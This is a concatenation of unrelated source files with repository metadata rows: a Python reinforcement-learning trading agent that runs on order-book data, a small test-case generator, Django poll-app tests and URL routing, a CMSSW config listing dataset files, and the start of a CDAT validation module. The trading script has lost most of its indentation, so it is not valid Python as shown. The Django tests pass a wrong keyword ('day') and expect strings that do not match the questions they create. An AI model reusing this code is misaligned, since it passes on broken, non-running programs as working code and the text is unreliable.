'Spreads': Buffer(look_back),
'Misbalances': Buffer(look_back),
'RollingVol': Buffer(look_back),
'RollingSignedVol': Buffer(look_back)
}
return market
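# Note: reset_market() deliberately omits the 'T', 'currstate', 'book' and
# 'nextbook' keys; callers fill those in before using generate_state() or
# update_market().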
def measure_profitability_path(env, times, backup, units, look_back, rolling_window, divs):
table = Q(1, backup)
percent_table = Q(1, backup)
# state variables
time = {}
profits = {}
T = times[0]
market = reset_market(look_back, rolling_window)
market['currstate'] = env.get_book(0)
market['book'] = env.get_book(0)
S = 1000
# train algorithm to buy
for T in times:
print (T)
time['T'] = T
for ts in range(look_back, look_back + S):
            if ts > look_back:
                market = reset_market(look_back, rolling_window)
            market['T'] = T
            generate_data(env, market, ts - look_back, ts)
cost = env.vol_order(market['currstate'], 0, units)
s = generate_state(market, divs)
for t in range(T):
market['nextbook'] = env.get_book(ts + t + 1)
update_market(market)
exit = market['currstate'].immediate_cost_sell(units)
neg_percent_profit = -1 * (exit - cost)/cost * 100
table.update_table(s, 1, neg_percent_profit)
if neg_percent_profit < -0.5:
percent_table.update_table(s, 1, 0)
else:
percent_table.update_table(s, 1, 1)
# train algorithm to sell
for T in times:
print (T)
time['T'] = T
for ts in range(look_back, look_back + S):
            if ts > look_back:
                market = reset_market(look_back, rolling_window)
            market['T'] = T
            generate_data(env, market, ts - look_back, ts)
short = env.vol_order(market['currstate'], 1, units)
s = generate_state(market, divs)
exited = False
for t in range(T):
market['nextbook'] = env.get_book(ts + t + 1)
update_market(market)
close = market['currstate'].immediate_cost_buy(units)
neg_percent_profit = -1 * (short - close)/short * 100
table.update_table(s, -1, neg_percent_profit)
if neg_percent_profit < -0.5:
percent_table.update_table(s, -1, 0)
else:
percent_table.update_table(s, -1, 1)
current_time = {}
profit_table = Q(1, backup)
for T in times:
market['T'] = T
current_time['T'] = T
for ts in range(look_back + S, look_back + S + 5000):
if ts % 100 == 0:
print(ts)
if ts > look_back:
market = reset_market(look_back, rolling_window)
market['T'] = T
generate_data(env, market, ts - look_back, ts)
s = generate_state(market, divs)
action, value = table.arg_min(s)
if value < 0.2:
# choose position to take based on the action suggested by table
exited = False
side = 0 if action == 1 else 1
enter = env.vol_order(market['currstate'], side, units)
for t in range(T):
market['nextbook'] = env.get_book(ts + t + 1)
update_market(market)
# determine profitability based on side
if side == 0:
# long position exit
exit = market['currstate'].immediate_cost_sell(units)
percent = (exit - enter)/enter * 100
else:
# short position exit
exit = market['currstate'].immediate_cost_buy(units)
percent = (enter - exit)/enter * 100
if percent > 0.52:
profit_table.update_table(current_time, 1, percent)
exited = True
break
if not exited:
profit_table.update_table(current_time, 1, percent)
import pdb
pdb.set_trace()
def rl_agent(env, times, backup, units, look_back, rolling_window, divs):
table = Q(1, backup)
percent_table = Q(1, backup)
# state variables
time = {}
profits = {}
T = max(times)
market = reset_market(look_back, rolling_window)
market['currstate'] = env.get_book(0)
market['book'] = env.get_book(0)
S = 1000
print (list(times))
backup_transitions = []
order_books = len(env.books)
random.seed(1)
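    # Train both entry directions: side 0 enters long (action +1), side 1
    # enters short (action -1); transitions are buffered and periodically
    # backed up into the Q table by backup_trs().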
for side in range(2):
opposite_side = (side + 1) % 2
action = pow(-1, side)
for ex in range(look_back, look_back + S):
ts = random.randint(look_back + 2, order_books - (T + 10))
if ex % 100 == 0:
backup_trs(table, backup_transitions)
backup_transitions = []
print(ts)
# set up the simulation and collect the lookback data
market = reset_market(look_back, rolling_window)
generate_data(env, market, ts - look_back, ts)
# calculate initial position cost and value
initial_p = env.vol_order(market['currstate'], side, units)
market['T'] = 0
s_0 = generate_state(market, divs)
market['I'] = pow(-1, side)
state_number = 0
for t in range(T + 1):
market['nextbook'] = env.get_book(ts + t + 1)
update_market(market)
if t in times:
market['T'] = t
state_number += 1
s_curr = generate_state(market, divs)
if state_number == 1:
curr_pos_v = market['currstate'].immediate_value(opposite_side, units)
neg_percent_profit = pow(-1, side + 1) * (curr_pos_v - initial_p)/initial_p * 100
backup_transitions.append([s_0, action, neg_percent_profit, curr_pos_v, initial_p])
else:
next_pos_v = market['currstate'].immediate_value(opposite_side, units)
neg_percent_change = pow(-1, side + 1) * (next_pos_v - curr_pos_v)/curr_pos_v * 100
backup_transitions.append([s_prev, 1, neg_percent_change, next_pos_v, curr_pos_v])
curr_pos_v = next_pos_v
s_prev = s_curr
backup_trs(table, backup_transitions)
current_time = {}
profit_table = Q(1, backup)
pred = []
act = []
for ex in range(0, 2000):
ts = random.randint(look_back, order_books - (T + 10))
if ex % 100 == 0:
print(ts)
if ts >= look_back:
market = reset_market(look_back, rolling_window)
market['T'] = 0
generate_data(env, market, ts - look_back, ts)
s_0 = generate_state(market, divs)
action, value = table.arg_min(s_0)
if value < -1:
pred.append(value)
# choose position to take based on the action suggested by table
side = 0 if action == 1 else 1
opposite_side = (side + 1) % 2
market['I'] = pow(-1, side)
enter_v = env.vol_order(market['currstate'], side, units)
exited = False
for t in range(T):
market['nextbook'] = env.get_book(ts + t + 1)
update_market(market)
if t in times:
market['T'] = t
curr_s = generate_state(market, divs)
a, v = table.arg_min(curr_s)
if v >= 0:
print ([a, v, t])
current_time['T'] = T
exit_v = market['currstate'].immediate_value(opposite_side, units)
percent = pow(-1, side) * (exit_v - enter_v )/enter_v * 100
act.append(percent)
profit_table.update_table(current_time, action, percent)
exited = True
break
if not exited:
current_time['T'] = T
exit_v = market['currstate'].immediate_value(opposite_side, units)
percent = pow(-1, side) * (exit_v - enter_v)/enter_v * 100
act.append(percent)
profit_table.update_table(current_time, action, percent)
import pdb
pdb.set_trace()
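# backup_trs walks the recorded transitions in reverse, backing each reward up
# into the Q table: the value stored for a state-action pair is its immediate
# reward plus min(successor value, 0) - minima throughout, because rewards
# here are negated profits.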
def backup_trs(table, backup_transitions):
states_done = 0
for transition in backup_transitions[::-1]:
state, action, reward, _, _ = transition
table.update_table(state, 0, 0)
if states_done == 0:
#print([state, action, reward, reward])
table.update_table(state, action, reward)
next_state_reward = reward
else:
backup = reward + min(next_state_reward, 0)
#print([state, action, reward, backup])
table.update_table(state, action, backup)
_, next_state_reward = table.arg_min(state)
states_done += 1
def process_output(table, func, executions, T, L):
"""
Process output for each run and write to file
"""
if table.backup['name'] == 'sampling' or table.backup['name'] == 'replay buffer':
table_to_write = table.Q
elif table.backup['name'] == 'doubleQ':
if func is None:
table_to_write = table.curr_Q
else:
table_to_write = []
table_to_write.append(table.Q_1)
table_to_write.append(table.Q_2)
else:
print ('agent.dp_algo - invalid backup method')
tradesOutputFilename = ''
if not func is None:
# linear approx model
tradesOutputFilename += 'linear-'
tradesOutputFilename += table.backup['name']
write_trades(executions, tradesOutputFilename=tradesOutputFilename)
if func is None:
write_table_files(table_to_write, T, L, tableOutputFilename=table.backup['name'])
else:
write_function(table_to_write, T, L, 'linear model',functionFilename=table.backup['name'])
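# create_variable_divs builds equal-width bucket boundaries over the observed
# range of each market feature; the compute_* helpers below map a raw value to
# its bucket index.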
def create_variable_divs(divs, env):
spreads = []
misbalances = []
imm_costs = []
signed_vols = []
if divs > 1:
spread_diff = (env.max_spread - env.min_spread) * 1.0 / (divs)
misbalance_diff = (env.max_misbalance - env.min_misbalance) * 1.0 / (divs)
imm_cost_diff = (env.max_imm_cost - env.min_imm_cost) * 1.0 / (divs)
signed_vols_diff = (env.max_signed_vol - env.min_signed_vol) * 1.0 / (divs)
for i in range(1, divs):
spreads.append(env.min_spread + i * spread_diff)
misbalances.append(env.min_misbalance + i * misbalance_diff)
imm_costs.append(env.min_imm_cost + i * imm_cost_diff)
signed_vols.append(env.min_signed_vol + i * signed_vols_diff)
spreads.sort()
misbalances.sort()
imm_costs.sort()
signed_vols.sort()
return spreads, misbalances, imm_costs, signed_vols
def compute_signed_vol(vol, signed_vols):
if len(signed_vols) == 0 or vol < signed_vols[0]:
return 0
for i in range(len(signed_vols) - 1):
if vol >= signed_vols[i] and vol < signed_vols[i+1]:
return (i + 1)
return len(signed_vols)
def compute_imm_cost(curr_book, inv, im_costs):
if inv == 0:
return 0
im_cost = curr_book.immediate_cost_buy(inv)
if len(im_costs) == 0 or im_cost < im_costs[0]:
return 0
for i in range(len(im_costs) - 1):
if im_cost >= im_costs[i] and im_cost < im_costs[i+1]:
return (i + 1)
return len(im_costs)
def compute_bid_ask_spread(curr_book, spreads):
spread = min(curr_book.a.keys()) - max(curr_book.b.keys())
if len(spreads) == 0 or spread < spreads[0]:
return 0
for i in range(len(spreads) - 1):
if spread >= spreads[i] and spread < spreads[i+1]:
return (i + 1)
return len(spreads)
def compute_volume_misbalance(curr_book, misbalances, env):
m = env.misbalance(curr_book)
if len(misbalances) == 0 or m < misbalances[0]:
return 0
for i in range(len(misbalances) - 1):
if m >= misbalances[i] and m < misbalances[i+1]:
return (i + 1)
return len(misbalances)
def write_trades(executions, tradesOutputFilename="run"):
trade_file = open(tradesOutputFilename + '-trades.csv', 'w')
# write trades executed
w = csv.writer(trade_file)
    executions.insert(0, ['Time Left', 'Rounded Units Left', 'Bid Ask Spread', 'Volume Misbalance', 'Immediate Cost', 'Signed Transaction Volume', 'Action', 'Reward', 'Volume'])
w.writerows(executions)
def write_function(function, T, L, model, functionFilename='run'):
table_file = open(functionFilename + '-' + model + '.csv', 'w')
tw = csv.writer(table_file)
table_rows = []
    table_rows.append(['Time Left', 'Rounded Units Left', 'Bid Ask Spread', 'Volume Misbalance', 'Immediate Cost', 'Signed Transaction Volume', 'Action'])
if type(function) is list:
table_rows.append(function[0].coef_)
table_rows.append(function[1].coef_)
table_rows.append(function[0].intercept_)
table_rows.append(function[1].intercept_)
else:
table_rows.append(function.coef_)
table_rows.append(function.intercept_)
tw.writerows(table_rows)
def write_table_files(table, T, L, tableOutputFilename="run"):
table_file = open(tableOutputFilename + '-tables.csv', 'w')
# write table
tw = csv.writer(table_file)
table_rows = []
    table_rows.append(['Time Left', 'Rounded Units Left', 'Bid Ask Spread', 'Volume Misbalance', 'Immediate Cost', 'Signed Transaction Volume', 'Action', 'Expected Payout'])
for key in table:
for action, payoff in table[key].items():
if type(action) != str:
t_left, rounded_unit, spread, volume_misbalance, im_cost, signed_vol = key.split(",")
table_rows.append([t_left, rounded_unit, spread, volume_misbalance, im_cost, signed_vol, action, payoff])
tw.writerows(table_rows)
"""
Here we run three backup methods, distinguished by how the DP tables are updated:
- sampling (simple update)
- double q learning
- replay buffer
"""
if __name__ == "__main__":
# define method params
doubleQbackup = {
'name': 'doubleQ'
}
samplingBackup = {
'name': 'sampling'
}
replayBufferBackup = { 'name': 'replay buffer',
'buff_size': 50,
'replays': 5
}
# tables
doubleQProcess = multiprocess.Process(target=dp_algo, args=("../data/10_GOOG.csv", 1000, 1000, 10, 10, 10, doubleQbackup, 100000))
samplingProcess = multiprocess.Process(target=dp_algo, args=("../data/10_GOOG.csv", 1000, 1000, 10, 10, 10, samplingBackup, 100000))
replayBufferProcess = multiprocess.Process(target=dp_algo, args=("../data/10_GOOG.csv", 1000, 1000, 10, 10, 10, replayBufferBackup, 100000))
# start
#doubleQProcess.start()
samplingProcess.start()
#replayBufferProcess.start()
# function approx
#func_doubleQProcess = multiprocess.Process(target=dp_algo, args=("../data/10_GOOG.csv", 1000, 1000, 10, 10, 10, doubleQbackup, "linear", 100000))
#func_samplingProcess = multiprocess.Process(target=dp_algo, args=("../data/10_GOOG.csv", 1000, 1000, 10, 10, 10, samplingBackup, "linear", 100000))
#func_replayBufferProcess = multiprocess.Process(target=dp_algo, args=("../data/10_GOOG.csv", 1000, 1000, 10, 10, 10, replayBufferBackup, "linear", 100000))
# start
#func_doubleQProcess.start()
#func_samplingProcess.start()
#func_replayBufferProcess.start()
| [
"[email protected]"
] | |
c85c5a1a21264c24b2b7a12107df2416af0ab32a | 7d1a96565a1b46eaa38770bc592f0f508ba659b3 | /SpojAm/BITANDOR2/testGen.py | a496d32ef0564d8b7e10439893bca07b29d8f113 | [] | no_license | RubenAshughyan/Programming-olympiads | f09dff286677d65da19f0ba4c288aa6e97ba9fd5 | 2bc85f5e6dc6879105353d90e8417b73c0be2389 | refs/heads/master | 2021-09-26T17:18:47.100625 | 2021-09-13T09:58:41 | 2021-09-13T09:58:41 | 73,565,659 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 171 | py | import random
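# Emits one random test case: "n k" on the first line, then n values in 1..60.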
n = random.randint(1,8)
k = random.randint(1,n)
a = []
for i in range(n):
a.append(str(random.randint(1,60)))
print('%d %d'%(n,k))
print(' '.join(a))
| [
"[email protected]"
] | |
9715c3b7af19ee4ef525002be62f336c8ac82a01 | e2bfd7409bf1501d14f1142e0110b9649ece0243 | /mysite/polls/tests.py | 5d395447270dcc5e5be9e6b5b79c7c6b7a1615f7 | [] | no_license | ostegura/django-sandbox | 4ea276d37f61a7dfb77626afb1d95d0e121d67a4 | e9c0fa3941b2de072d0be47554173b98e4abba79 | refs/heads/master | 2020-04-11T05:29:30.538174 | 2018-12-15T23:35:39 | 2018-12-15T23:35:39 | 161,551,134 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,046 | py | import datetime
from django.test import TestCase
from django.utils import timezone
from django.urls import reverse
from .models import Question
# Create your tests here.
class QuestionModelTest(TestCase):
def test_was_published_recently_with_future_question(self):
"""
        was_published_recently() returns False for questions whose pub_date is in the future
"""
time = timezone.now() + datetime.timedelta(days=30)
future_question = Question(pub_date=time)
self.assertIs(future_question.was_published_recently(), False)
def test_was_published_recently_with_old_question(self):
"""
        was_published_recently() returns False for questions whose pub_date is older than 1 day
"""
time = timezone.now() - datetime.timedelta(days=1, seconds=1)
old_question = Question(pub_date=time)
self.assertIs(old_question.was_published_recently(), False)
def test_was_published_recently_with_recent_question(self):
"""
        was_published_recently() returns True for questions whose pub_date is within the last day
"""
time = timezone.now() - datetime.timedelta(hours=23, minutes=59, seconds=59)
recent_question = Question(pub_date=time)
        self.assertIs(recent_question.was_published_recently(), True)
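# Helper: create a question whose pub_date is offset `days` from now
# (negative for questions published in the past, positive for the future).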
def create_question(question_text, days):
time = timezone.now() + datetime.timedelta(days=days)
return Question.objects.create(question_text=question_text, pub_date=time)
class QuestionIndexViewTest(TestCase):
def test_no_question(self):
response = self.client.get(reverse('polls:index'))
self.assertEqual(response.status_code, 200)
self.assertContains(response, "No polls are avalaible.")
self.assertQuerysetEqual(response.context['latest_question_list'], [])
def test_past_question(self):
"""
if question is from the past we display it on the index page
"""
create_question(question_text="Past question", days=-30)
response = self.client.get(reverse('polls:index'))
self.assertQuerysetEqual(
response.context['latest_question_list'],
['<Question: Past question.>']
)
def test_future_question(self):
create_question(question_text="Future question", days=30)
response = self.client.get(reverse('polls:index'))
self.assertContains(response, "No polls are avalaible.")
self.assertQuerysetEqual(response.context['latest_question_list'], [])
def test_future_and_past_question(self):
# even if future question exists we display only past question
create_question(question_text="Past question.", day=-30)
create_question(question_text="Future question.", day=30)
response = self.client.get(reverse('polls:index'))
self.assertQuerysetEqual(
response.context['latest_question_list'],
['<Question: Past question.>']
)
def test_two_past_questions(self):
create_question(question_text="Past question 1.", days=-30)
create_question(question_text="Past question 2.", days=-5)
response = self.client.get(reverse('polls:index'))
self.assertQuerysetEqual(
response.context['latest_question_list'],
            ['<Question: Past question 2.>', '<Question: Past question 1.>']
)
class QuestionDetailViewTest(TestCase):
def test_future_question(self):
"""
detail view returns error 404 if pub_date is in the future
"""
future_question = create_question(question_text="Future question.", days=5)
url = reverse('polls:detail', args=(future_question.id,))
response = self.client.get(url)
self.assertEqual(response.status_code, 404)
def test_past_question(self):
"""
if question is in the past returns its text
"""
past_question = create_question(question_text="Past question.", days=-5)
url = reverse('polls:detail', args=(past_question.id,))
response = self.client.get(url)
self.assertContains(response, past_question.question_text)
| [
"[email protected]"
] | |
dea799d87d12c2628b0fd3290d7c4109bedd94a1 | 0e4e78b06c7e4fc97cef7ac548d523ccb9bb4d9c | /helloproject/helloproject/helloapp/admin.py | c2b015baf865faba3034338a74a8702eed38736f | [] | no_license | neethu5694/DemoPython | 64d93d37653edcc7fd542e27f7acdd4eb7151901 | ae467aa42a0dbe26d1788501d925b16c1a6d974c | refs/heads/master | 2023-05-26T00:14:03.218898 | 2021-06-11T08:42:14 | 2021-06-11T08:42:14 | 368,198,187 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 163 | py | from django.contrib import admin
from . models import Place
from django.contrib.sites.models import Site
# Register your models here.
admin.site.register(Place)
| [
"[email protected]"
] | |
d44d6479e4e2c0520aa1f8d3b7d797376560d7f7 | acc12c85b0c56b601ddf3ebc7d53d2dc1f93d43f | /zhuangxiusheji/zhuangxiusheji/urls.py | f7261afd2e68a91d27f35b7df99e5ca5c72990c2 | [] | no_license | wadelu/zhuangxiusheji-django | 45b177b8dd7292279435696c214399c95519f389 | 82e8c8467ade4c3a75a59e3e5b3b01d2bc0f3243 | refs/heads/master | 2023-08-15T05:36:04.409999 | 2019-04-20T12:45:05 | 2019-04-20T12:45:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,245 | py | """zhuangxiusheji URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.11/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url, include
from django.contrib import admin
from zx_user.views import index
from django.conf.urls.static import static
from django.conf import settings
urlpatterns = [
url(r'^$', index),
url(r'^admin/', admin.site.urls),
    url(r'^user/', include('zx_user.urls', namespace='user')),
url(r'^user_center/', include('zx_user_center.urls', namespace='user_center')),
url(r'^anli/', include('zx_anli.urls', namespace='anli')),
url(r'^draw/', include('zx_draw.urls', namespace='draw')),
] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
| [
"[email protected]"
] | |
18450d2173dc9d932a9d33cb955be284a78f7949 | 853a026149fd951a70f572f3e579e6ae24109a53 | /SUSYAnalysis/Configuration/Run2011/analysis_forNAF/RA4b_TTJets_ScaleUp.py | 50594837f2072d897a9acad6bf60e6416218a730 | [] | no_license | npietsch/usercode | 33900d00fc69dcfbba061ff3d4f869e34d368b59 | 02a2258f91b519562ff0983266b4128e49f21ce9 | refs/heads/master | 2020-04-12T07:47:53.511961 | 2013-10-30T18:37:16 | 2013-10-30T18:37:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,329 | py | #-------------------------------------------
# To run on the NAF, type:
#
# export NJS_QUEUE=12
# nafJobSplitter.pl 235 RA4b_TTJets_cfg.py
#-------------------------------------------
from BjetsPAT_cfg import *
process.eventWeightPU.MCSampleFile = "TopAnalysis/TopUtils/data/MC_PUDist_Summer11_TTJets_TuneZ2_7TeV_madgraph_tauola.root"
# Choose input files
process.source = cms.Source("PoolSource",
fileNames = cms.untracked.vstring(
'/store/user/cakir/TTjets_TuneZ2_scaleup_7TeV-madgraph-tauola/SUSYPAT_TTJets_ScaleUp/27ea4c3403b4ce5da6d8f3d236870fb8/Summer11_21_1_icR.root',
'/store/user/cakir/TTjets_TuneZ2_scaleup_7TeV-madgraph-tauola/SUSYPAT_TTJets_ScaleUp/27ea4c3403b4ce5da6d8f3d236870fb8/Summer11_6_1_NaJ.root',
'/store/user/cakir/TTjets_TuneZ2_scaleup_7TeV-madgraph-tauola/SUSYPAT_TTJets_ScaleUp/27ea4c3403b4ce5da6d8f3d236870fb8/Summer11_19_1_h8W.root',
'/store/user/cakir/TTjets_TuneZ2_scaleup_7TeV-madgraph-tauola/SUSYPAT_TTJets_ScaleUp/27ea4c3403b4ce5da6d8f3d236870fb8/Summer11_7_1_0i2.root',
'/store/user/cakir/TTjets_TuneZ2_scaleup_7TeV-madgraph-tauola/SUSYPAT_TTJets_ScaleUp/27ea4c3403b4ce5da6d8f3d236870fb8/Summer11_1_1_Xlx.root',
'/store/user/cakir/TTjets_TuneZ2_scaleup_7TeV-madgraph-tauola/SUSYPAT_TTJets_ScaleUp/27ea4c3403b4ce5da6d8f3d236870fb8/Summer11_25_1_C9T.root',
'/store/user/cakir/TTjets_TuneZ2_scaleup_7TeV-madgraph-tauola/SUSYPAT_TTJets_ScaleUp/27ea4c3403b4ce5da6d8f3d236870fb8/Summer11_33_1_nlM.root',
'/store/user/cakir/TTjets_TuneZ2_scaleup_7TeV-madgraph-tauola/SUSYPAT_TTJets_ScaleUp/27ea4c3403b4ce5da6d8f3d236870fb8/Summer11_24_1_sS2.root',
'/store/user/cakir/TTjets_TuneZ2_scaleup_7TeV-madgraph-tauola/SUSYPAT_TTJets_ScaleUp/27ea4c3403b4ce5da6d8f3d236870fb8/Summer11_28_1_32L.root',
'/store/user/cakir/TTjets_TuneZ2_scaleup_7TeV-madgraph-tauola/SUSYPAT_TTJets_ScaleUp/27ea4c3403b4ce5da6d8f3d236870fb8/Summer11_41_1_AHq.root',
'/store/user/cakir/TTjets_TuneZ2_scaleup_7TeV-madgraph-tauola/SUSYPAT_TTJets_ScaleUp/27ea4c3403b4ce5da6d8f3d236870fb8/Summer11_47_1_o4i.root',
'/store/user/cakir/TTjets_TuneZ2_scaleup_7TeV-madgraph-tauola/SUSYPAT_TTJets_ScaleUp/27ea4c3403b4ce5da6d8f3d236870fb8/Summer11_20_1_yIB.root',
'/store/user/cakir/TTjets_TuneZ2_scaleup_7TeV-madgraph-tauola/SUSYPAT_TTJets_ScaleUp/27ea4c3403b4ce5da6d8f3d236870fb8/Summer11_38_1_038.root',
'/store/user/cakir/TTjets_TuneZ2_scaleup_7TeV-madgraph-tauola/SUSYPAT_TTJets_ScaleUp/27ea4c3403b4ce5da6d8f3d236870fb8/Summer11_15_1_Xr7.root',
'/store/user/cakir/TTjets_TuneZ2_scaleup_7TeV-madgraph-tauola/SUSYPAT_TTJets_ScaleUp/27ea4c3403b4ce5da6d8f3d236870fb8/Summer11_23_1_5fZ.root',
'/store/user/cakir/TTjets_TuneZ2_scaleup_7TeV-madgraph-tauola/SUSYPAT_TTJets_ScaleUp/27ea4c3403b4ce5da6d8f3d236870fb8/Summer11_4_1_ria.root',
'/store/user/cakir/TTjets_TuneZ2_scaleup_7TeV-madgraph-tauola/SUSYPAT_TTJets_ScaleUp/27ea4c3403b4ce5da6d8f3d236870fb8/Summer11_34_1_gNJ.root',
'/store/user/cakir/TTjets_TuneZ2_scaleup_7TeV-madgraph-tauola/SUSYPAT_TTJets_ScaleUp/27ea4c3403b4ce5da6d8f3d236870fb8/Summer11_22_1_Qw2.root',
'/store/user/cakir/TTjets_TuneZ2_scaleup_7TeV-madgraph-tauola/SUSYPAT_TTJets_ScaleUp/27ea4c3403b4ce5da6d8f3d236870fb8/Summer11_27_1_OEU.root',
'/store/user/cakir/TTjets_TuneZ2_scaleup_7TeV-madgraph-tauola/SUSYPAT_TTJets_ScaleUp/27ea4c3403b4ce5da6d8f3d236870fb8/Summer11_30_1_1rQ.root',
'/store/user/cakir/TTjets_TuneZ2_scaleup_7TeV-madgraph-tauola/SUSYPAT_TTJets_ScaleUp/27ea4c3403b4ce5da6d8f3d236870fb8/Summer11_26_1_AWI.root',
'/store/user/cakir/TTjets_TuneZ2_scaleup_7TeV-madgraph-tauola/SUSYPAT_TTJets_ScaleUp/27ea4c3403b4ce5da6d8f3d236870fb8/Summer11_5_1_zD8.root',
'/store/user/cakir/TTjets_TuneZ2_scaleup_7TeV-madgraph-tauola/SUSYPAT_TTJets_ScaleUp/27ea4c3403b4ce5da6d8f3d236870fb8/Summer11_42_1_j6f.root',
'/store/user/cakir/TTjets_TuneZ2_scaleup_7TeV-madgraph-tauola/SUSYPAT_TTJets_ScaleUp/27ea4c3403b4ce5da6d8f3d236870fb8/Summer11_45_1_ylH.root',
'/store/user/cakir/TTjets_TuneZ2_scaleup_7TeV-madgraph-tauola/SUSYPAT_TTJets_ScaleUp/27ea4c3403b4ce5da6d8f3d236870fb8/Summer11_11_1_Wy0.root',
'/store/user/cakir/TTjets_TuneZ2_scaleup_7TeV-madgraph-tauola/SUSYPAT_TTJets_ScaleUp/27ea4c3403b4ce5da6d8f3d236870fb8/Summer11_12_1_MHa.root',
'/store/user/cakir/TTjets_TuneZ2_scaleup_7TeV-madgraph-tauola/SUSYPAT_TTJets_ScaleUp/27ea4c3403b4ce5da6d8f3d236870fb8/Summer11_43_1_DBn.root',
'/store/user/cakir/TTjets_TuneZ2_scaleup_7TeV-madgraph-tauola/SUSYPAT_TTJets_ScaleUp/27ea4c3403b4ce5da6d8f3d236870fb8/Summer11_36_1_OpW.root',
'/store/user/cakir/TTjets_TuneZ2_scaleup_7TeV-madgraph-tauola/SUSYPAT_TTJets_ScaleUp/27ea4c3403b4ce5da6d8f3d236870fb8/Summer11_29_1_zBx.root',
'/store/user/cakir/TTjets_TuneZ2_scaleup_7TeV-madgraph-tauola/SUSYPAT_TTJets_ScaleUp/27ea4c3403b4ce5da6d8f3d236870fb8/Summer11_13_1_oc1.root',
'/store/user/cakir/TTjets_TuneZ2_scaleup_7TeV-madgraph-tauola/SUSYPAT_TTJets_ScaleUp/27ea4c3403b4ce5da6d8f3d236870fb8/Summer11_35_1_kRa.root',
'/store/user/cakir/TTjets_TuneZ2_scaleup_7TeV-madgraph-tauola/SUSYPAT_TTJets_ScaleUp/27ea4c3403b4ce5da6d8f3d236870fb8/Summer11_14_1_T9y.root',
'/store/user/cakir/TTjets_TuneZ2_scaleup_7TeV-madgraph-tauola/SUSYPAT_TTJets_ScaleUp/27ea4c3403b4ce5da6d8f3d236870fb8/Summer11_37_1_2ao.root',
'/store/user/cakir/TTjets_TuneZ2_scaleup_7TeV-madgraph-tauola/SUSYPAT_TTJets_ScaleUp/27ea4c3403b4ce5da6d8f3d236870fb8/Summer11_17_1_Nd6.root',
'/store/user/cakir/TTjets_TuneZ2_scaleup_7TeV-madgraph-tauola/SUSYPAT_TTJets_ScaleUp/27ea4c3403b4ce5da6d8f3d236870fb8/Summer11_9_1_U2H.root',
'/store/user/cakir/TTjets_TuneZ2_scaleup_7TeV-madgraph-tauola/SUSYPAT_TTJets_ScaleUp/27ea4c3403b4ce5da6d8f3d236870fb8/Summer11_39_1_BuP.root',
'/store/user/cakir/TTjets_TuneZ2_scaleup_7TeV-madgraph-tauola/SUSYPAT_TTJets_ScaleUp/27ea4c3403b4ce5da6d8f3d236870fb8/Summer11_40_1_Yfj.root',
'/store/user/cakir/TTjets_TuneZ2_scaleup_7TeV-madgraph-tauola/SUSYPAT_TTJets_ScaleUp/27ea4c3403b4ce5da6d8f3d236870fb8/Summer11_10_1_PDJ.root',
'/store/user/cakir/TTjets_TuneZ2_scaleup_7TeV-madgraph-tauola/SUSYPAT_TTJets_ScaleUp/27ea4c3403b4ce5da6d8f3d236870fb8/Summer11_44_1_HqJ.root',
'/store/user/cakir/TTjets_TuneZ2_scaleup_7TeV-madgraph-tauola/SUSYPAT_TTJets_ScaleUp/27ea4c3403b4ce5da6d8f3d236870fb8/Summer11_46_1_7GX.root',
'/store/user/cakir/TTjets_TuneZ2_scaleup_7TeV-madgraph-tauola/SUSYPAT_TTJets_ScaleUp/27ea4c3403b4ce5da6d8f3d236870fb8/Summer11_31_1_eEH.root',
'/store/user/cakir/TTjets_TuneZ2_scaleup_7TeV-madgraph-tauola/SUSYPAT_TTJets_ScaleUp/27ea4c3403b4ce5da6d8f3d236870fb8/Summer11_8_1_R40.root',
'/store/user/cakir/TTjets_TuneZ2_scaleup_7TeV-madgraph-tauola/SUSYPAT_TTJets_ScaleUp/27ea4c3403b4ce5da6d8f3d236870fb8/Summer11_16_1_kOI.root',
'/store/user/cakir/TTjets_TuneZ2_scaleup_7TeV-madgraph-tauola/SUSYPAT_TTJets_ScaleUp/27ea4c3403b4ce5da6d8f3d236870fb8/Summer11_32_1_lXM.root',
'/store/user/cakir/TTjets_TuneZ2_scaleup_7TeV-madgraph-tauola/SUSYPAT_TTJets_ScaleUp/27ea4c3403b4ce5da6d8f3d236870fb8/Summer11_18_1_wz7.root',
'/store/user/cakir/TTjets_TuneZ2_scaleup_7TeV-madgraph-tauola/SUSYPAT_TTJets_ScaleUp/27ea4c3403b4ce5da6d8f3d236870fb8/Summer11_2_1_Eyj.root',
'/store/user/cakir/TTjets_TuneZ2_scaleup_7TeV-madgraph-tauola/SUSYPAT_TTJets_ScaleUp/27ea4c3403b4ce5da6d8f3d236870fb8/Summer11_3_1_cTe.root',
'/store/user/cakir/TTjets_TuneZ2_scaleup_7TeV-madgraph-tauola/SUSYPAT_TTJets_ScaleUp/27ea4c3403b4ce5da6d8f3d236870fb8/Summer11_48_1_M2E.root'
)
)
| [
""
] | |
ec3898329463467c854b0e5a88d15405f4406423 | b6a4ef1af73ee96e995659ca2a5f0eb97c708674 | /Packages/cdutil/Lib/ValidationFunctions.py | 7d7c78b49ccabc02d58dd706c26a9c1516f1a259 | [] | no_license | cedadev/cdat_lite | 1bff56d3e894af41abb9769ead83415b84313a5e | cd92cfd918e602110c0c6aaa3555d1632dd64f48 | refs/heads/master | 2021-01-15T17:45:29.077765 | 2019-07-04T17:39:32 | 2019-07-04T17:39:32 | 14,837,672 | 3 | 1 | null | null | null | null | UTF-8 | Python | false | false | 5,258 | py | # Adapted for numpy/ma/cdms2 by convertcdms.py
import string
import types
import numpy
import numpy.ma
import cdms2
import os
import cdutil
def checkStringOrNone(self,name,value):
if not type(value) in [types.StringType,types.NoneType]:
raise ValueError,name+' must be a string or None'
return value
def checkListNumbers(self,name,value):
""" check for a list of 4 number"""
if not type(value) in [types.ListType,types.TupleType,types.NoneType]:
raise ValueError, name + ' must be a list/tuple/None'
if not value is None:
for v in value:
